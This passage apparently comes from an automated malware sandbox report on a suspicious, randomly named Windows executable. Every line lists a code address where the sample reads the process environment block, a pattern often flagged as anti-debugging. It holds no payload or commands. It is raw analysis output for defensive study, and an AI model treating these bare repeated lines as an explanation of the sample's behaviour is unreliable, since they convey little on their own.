                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0750 mov eax, dword ptr fs:[00000030h]2_2_019F0750
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00770 mov eax, dword ptr fs:[00000030h]2_2_01A00770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8770 mov eax, dword ptr fs:[00000030h]2_2_019F8770
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2674D mov esi, dword ptr fs:[00000030h]2_2_01A2674D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2674D mov eax, dword ptr fs:[00000030h]2_2_01A2674D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2674D mov eax, dword ptr fs:[00000030h]2_2_01A2674D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A74755 mov eax, dword ptr fs:[00000030h]2_2_01A74755
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32750 mov eax, dword ptr fs:[00000030h]2_2_01A32750
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32750 mov eax, dword ptr fs:[00000030h]2_2_01A32750
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E75D mov eax, dword ptr fs:[00000030h]2_2_01A7E75D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C6A6 mov eax, dword ptr fs:[00000030h]2_2_01A2C6A6
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4690 mov eax, dword ptr fs:[00000030h]2_2_019F4690
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4690 mov eax, dword ptr fs:[00000030h]2_2_019F4690
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A266B0 mov eax, dword ptr fs:[00000030h]2_2_01A266B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E6F2 mov eax, dword ptr fs:[00000030h]2_2_01A6E6F2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E6F2 mov eax, dword ptr fs:[00000030h]2_2_01A6E6F2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E6F2 mov eax, dword ptr fs:[00000030h]2_2_01A6E6F2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E6F2 mov eax, dword ptr fs:[00000030h]2_2_01A6E6F2
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A706F1 mov eax, dword ptr fs:[00000030h]2_2_01A706F1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A706F1 mov eax, dword ptr fs:[00000030h]2_2_01A706F1
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A6C7 mov ebx, dword ptr fs:[00000030h]2_2_01A2A6C7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A6C7 mov eax, dword ptr fs:[00000030h]2_2_01A2A6C7
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A26620 mov eax, dword ptr fs:[00000030h]2_2_01A26620
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28620 mov eax, dword ptr fs:[00000030h]2_2_01A28620
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0E627 mov eax, dword ptr fs:[00000030h]2_2_01A0E627
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0260B mov eax, dword ptr fs:[00000030h]2_2_01A0260B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E609 mov eax, dword ptr fs:[00000030h]2_2_01A6E609
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F262C mov eax, dword ptr fs:[00000030h]2_2_019F262C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32619 mov eax, dword ptr fs:[00000030h]2_2_01A32619
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A660 mov eax, dword ptr fs:[00000030h]2_2_01A2A660
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A660 mov eax, dword ptr fs:[00000030h]2_2_01A2A660
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB866E mov eax, dword ptr fs:[00000030h]2_2_01AB866E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB866E mov eax, dword ptr fs:[00000030h]2_2_01AB866E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A22674 mov eax, dword ptr fs:[00000030h]2_2_01A22674
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A0C640 mov eax, dword ptr fs:[00000030h]2_2_01A0C640
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A029A0 mov eax, dword ptr fs:[00000030h]2_2_01A029A0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A789B3 mov esi, dword ptr fs:[00000030h]2_2_01A789B3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A789B3 mov eax, dword ptr fs:[00000030h]2_2_01A789B3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A789B3 mov eax, dword ptr fs:[00000030h]2_2_01A789B3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F09AD mov eax, dword ptr fs:[00000030h]2_2_019F09AD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F09AD mov eax, dword ptr fs:[00000030h]2_2_019F09AD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E9E0 mov eax, dword ptr fs:[00000030h]2_2_01A7E9E0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FA9D0 mov eax, dword ptr fs:[00000030h]2_2_019FA9D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A229F9 mov eax, dword ptr fs:[00000030h]2_2_01A229F9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A229F9 mov eax, dword ptr fs:[00000030h]2_2_01A229F9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A869C0 mov eax, dword ptr fs:[00000030h]2_2_01A869C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A249D0 mov eax, dword ptr fs:[00000030h]2_2_01A249D0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABA9D3 mov eax, dword ptr fs:[00000030h]2_2_01ABA9D3
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A8892B mov eax, dword ptr fs:[00000030h]2_2_01A8892B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8918 mov eax, dword ptr fs:[00000030h]2_2_019E8918
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019E8918 mov eax, dword ptr fs:[00000030h]2_2_019E8918
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7892A mov eax, dword ptr fs:[00000030h]2_2_01A7892A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E908 mov eax, dword ptr fs:[00000030h]2_2_01A6E908
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6E908 mov eax, dword ptr fs:[00000030h]2_2_01A6E908
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C912 mov eax, dword ptr fs:[00000030h]2_2_01A7C912
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A16962 mov eax, dword ptr fs:[00000030h]2_2_01A16962
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A16962 mov eax, dword ptr fs:[00000030h]2_2_01A16962
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A16962 mov eax, dword ptr fs:[00000030h]2_2_01A16962
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A3096E mov eax, dword ptr fs:[00000030h]2_2_01A3096E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A3096E mov edx, dword ptr fs:[00000030h]2_2_01A3096E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A3096E mov eax, dword ptr fs:[00000030h]2_2_01A3096E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A94978 mov eax, dword ptr fs:[00000030h]2_2_01A94978
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A94978 mov eax, dword ptr fs:[00000030h]2_2_01A94978
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C97C mov eax, dword ptr fs:[00000030h]2_2_01A7C97C
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A70946 mov eax, dword ptr fs:[00000030h]2_2_01A70946
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0887 mov eax, dword ptr fs:[00000030h]2_2_019F0887
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C89D mov eax, dword ptr fs:[00000030h]2_2_01A7C89D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABA8E4 mov eax, dword ptr fs:[00000030h]2_2_01ABA8E4
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C8F9 mov eax, dword ptr fs:[00000030h]2_2_01A2C8F9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2C8F9 mov eax, dword ptr fs:[00000030h]2_2_01A2C8F9
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1E8C0 mov eax, dword ptr fs:[00000030h]2_2_01A1E8C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2A830 mov eax, dword ptr fs:[00000030h]2_2_01A2A830
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9483A mov eax, dword ptr fs:[00000030h]2_2_01A9483A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9483A mov eax, dword ptr fs:[00000030h]2_2_01A9483A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov ecx, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A12835 mov eax, dword ptr fs:[00000030h]2_2_01A12835
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7C810 mov eax, dword ptr fs:[00000030h]2_2_01A7C810
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4859 mov eax, dword ptr fs:[00000030h]2_2_019F4859
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F4859 mov eax, dword ptr fs:[00000030h]2_2_019F4859
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E872 mov eax, dword ptr fs:[00000030h]2_2_01A7E872
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7E872 mov eax, dword ptr fs:[00000030h]2_2_01A7E872
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86870 mov eax, dword ptr fs:[00000030h]2_2_01A86870
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86870 mov eax, dword ptr fs:[00000030h]2_2_01A86870
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A02840 mov ecx, dword ptr fs:[00000030h]2_2_01A02840
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A20854 mov eax, dword ptr fs:[00000030h]2_2_01A20854
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA4BB0 mov eax, dword ptr fs:[00000030h]2_2_01AA4BB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA4BB0 mov eax, dword ptr fs:[00000030h]2_2_01AA4BB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00BBE mov eax, dword ptr fs:[00000030h]2_2_01A00BBE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A00BBE mov eax, dword ptr fs:[00000030h]2_2_01A00BBE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0BCD mov eax, dword ptr fs:[00000030h]2_2_019F0BCD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0BCD mov eax, dword ptr fs:[00000030h]2_2_019F0BCD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0BCD mov eax, dword ptr fs:[00000030h]2_2_019F0BCD
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7CBF0 mov eax, dword ptr fs:[00000030h]2_2_01A7CBF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1EBFC mov eax, dword ptr fs:[00000030h]2_2_01A1EBFC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A10BCB mov eax, dword ptr fs:[00000030h]2_2_01A10BCB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A10BCB mov eax, dword ptr fs:[00000030h]2_2_01A10BCB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A10BCB mov eax, dword ptr fs:[00000030h]2_2_01A10BCB
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8BF0 mov eax, dword ptr fs:[00000030h]2_2_019F8BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8BF0 mov eax, dword ptr fs:[00000030h]2_2_019F8BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8BF0 mov eax, dword ptr fs:[00000030h]2_2_019F8BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9EBD0 mov eax, dword ptr fs:[00000030h]2_2_01A9EBD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1EB20 mov eax, dword ptr fs:[00000030h]2_2_01A1EB20
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1EB20 mov eax, dword ptr fs:[00000030h]2_2_01A1EB20
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB8B28 mov eax, dword ptr fs:[00000030h]2_2_01AB8B28
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AB8B28 mov eax, dword ptr fs:[00000030h]2_2_01AB8B28
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A6EB1D mov eax, dword ptr fs:[00000030h]2_2_01A6EB1D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019ECB7E mov eax, dword ptr fs:[00000030h]2_2_019ECB7E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA4B4B mov eax, dword ptr fs:[00000030h]2_2_01AA4B4B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AA4B4B mov eax, dword ptr fs:[00000030h]2_2_01AA4B4B
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86B40 mov eax, dword ptr fs:[00000030h]2_2_01A86B40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A86B40 mov eax, dword ptr fs:[00000030h]2_2_01A86B40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01ABAB40 mov eax, dword ptr fs:[00000030h]2_2_01ABAB40
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A98B42 mov eax, dword ptr fs:[00000030h]2_2_01A98B42
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9EB50 mov eax, dword ptr fs:[00000030h]2_2_01A9EB50
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A46AA4 mov eax, dword ptr fs:[00000030h]2_2_01A46AA4
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019FEA80 mov eax, dword ptr fs:[00000030h]2_2_019FEA80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01AC4A80 mov eax, dword ptr fs:[00000030h]2_2_01AC4A80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A28A90 mov edx, dword ptr fs:[00000030h]2_2_01A28A90
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8AA0 mov eax, dword ptr fs:[00000030h]2_2_019F8AA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F8AA0 mov eax, dword ptr fs:[00000030h]2_2_019F8AA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2AAEE mov eax, dword ptr fs:[00000030h]2_2_01A2AAEE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2AAEE mov eax, dword ptr fs:[00000030h]2_2_01A2AAEE
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_019F0AD0 mov eax, dword ptr fs:[00000030h]2_2_019F0AD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A46ACC mov eax, dword ptr fs:[00000030h]2_2_01A46ACC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A46ACC mov eax, dword ptr fs:[00000030h]2_2_01A46ACC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A46ACC mov eax, dword ptr fs:[00000030h]2_2_01A46ACC
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A24AD0 mov eax, dword ptr fs:[00000030h]2_2_01A24AD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A24AD0 mov eax, dword ptr fs:[00000030h]2_2_01A24AD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA24 mov eax, dword ptr fs:[00000030h]2_2_01A2CA24
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A1EA2E mov eax, dword ptr fs:[00000030h]2_2_01A1EA2E
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A14A35 mov eax, dword ptr fs:[00000030h]2_2_01A14A35
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A14A35 mov eax, dword ptr fs:[00000030h]2_2_01A14A35
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA38 mov eax, dword ptr fs:[00000030h]2_2_01A2CA38
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A7CA11 mov eax, dword ptr fs:[00000030h]2_2_01A7CA11
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A9EA60 mov eax, dword ptr fs:[00000030h]2_2_01A9EA60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA6F mov eax, dword ptr fs:[00000030h]2_2_01A2CA6F
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A2CA6F mov eax, dword ptr fs:[00000030h]2_2_01A2CA6F
